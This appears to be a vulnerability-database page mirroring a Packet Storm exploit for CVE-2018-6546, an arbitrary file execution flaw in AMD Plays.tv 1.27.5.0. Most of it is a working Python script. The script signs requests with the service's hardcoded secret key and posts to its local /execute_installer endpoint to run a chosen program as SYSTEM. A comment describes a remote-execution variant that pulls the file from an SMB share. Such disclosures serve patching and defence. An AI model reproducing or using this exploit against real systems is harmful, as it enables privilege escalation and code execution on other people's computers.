Lucene search

AMD Plays.tv 1.27.5.0 Arbitrary File Execution

🗓️ 15 Apr 2018 00:00:00Reported by SecuriferaType

packetstorm🔗 packetstormsecurity.com👁 27 Views

AMD Plays.tv Arbitrary File Execution on Window

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 6
0day.today	AMD Plays.tv 1.27.5.0 - plays_service.exe Arbitrary File Execution Exploit	17 Apr 201800:00	–	zdt
Prion	Code injection	13 Apr 201816:29	–	prion
NVD	CVE-2018-6546	13 Apr 201816:29	–	nvd
CVE	CVE-2018-6546	13 Apr 201816:29	–	cve
Cvelist	CVE-2018-6546	13 Apr 201816:00	–	cvelist
Check Point Advisories	Plays.tv Remote Code Execution (CVE-2018-6546)	5 Jun 202000:00	–	checkpoint_advisories

`########################################################################  
# http://support.amd.com/en-us/download?cmpid=CCCOffline -   
# Click "Automatically Detect - Download Now"  
# Installation Automatically Installs "Raptr, Inc Plays TV Service"  
#  
# OR  
#  
# https://plays.tv/download  
#  
# Target OS: Windows( Any )  
# Privilege: SYSTEM  
# Type: Arbitrary File Execution  
#  
# Notes: Second minor bug allows for arbitrary file write of   
# uncontrolled data using the /extract_files path.  
#  
########################################################################  
  
#!/usr/bin/python3  
import urllib.request  
import json  
import hashlib  
  
def check_svc( path, data ):  
  
#Setup request  
request = urllib.request.Request(addr)  
  
#add post data  
try:  
resp = urllib.request.urlopen(request, "data".encode("utf-8"))  
return "[-] Not Raptr, Plays TV service"  
except urllib.error.HTTPError as err:  
error_message = err.read().decode("utf-8")  
if error_message == 'Security failed - Missing hash or message[data]':  
return "[+] Raptr, Plays TV service"  
  
def post_req( path, data ):  
  
secret_key = 'a%qs0t33QgiE6ut^0I&Y'  
  
#Setup request  
request = urllib.request.Request(addr)  
json_data = json.dumps(data)  
  
m = hashlib.md5()  
hash_data = path + json_data + secret_key  
m.update(hash_data.encode('utf8'))  
hash_str = m.hexdigest()  
  
#add post data  
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")  
resp = urllib.request.urlopen(request, p_data)  
return resp.read()  
  
#Target IP address  
ip = '127.0.0.1'  
  
##############################################################  
# The service binds to an ephemeral port defined at  
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]   
##############################################################  
port = 50452  
  
##############################################################  
# The service calls CreateProcess with the following format:   
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)  
#  
# One way to achieving remote code execution is to use SMB  
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"  
##############################################################  
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution  
data = {  
"installer": cmd,  
"appdata": cmd  
}  
  
#Set url  
path = '/execute_installer'  
addr = 'http://' + ip + ':' + str(port) + path  
  
#Check if the remote service is a Raptr Plays TV svc  
#ret = check_svc(data, path)  
#print(ret)  
  
#Exploit service  
ret = post_req(path, data)  
print(ret)  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Apr 2018 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.43221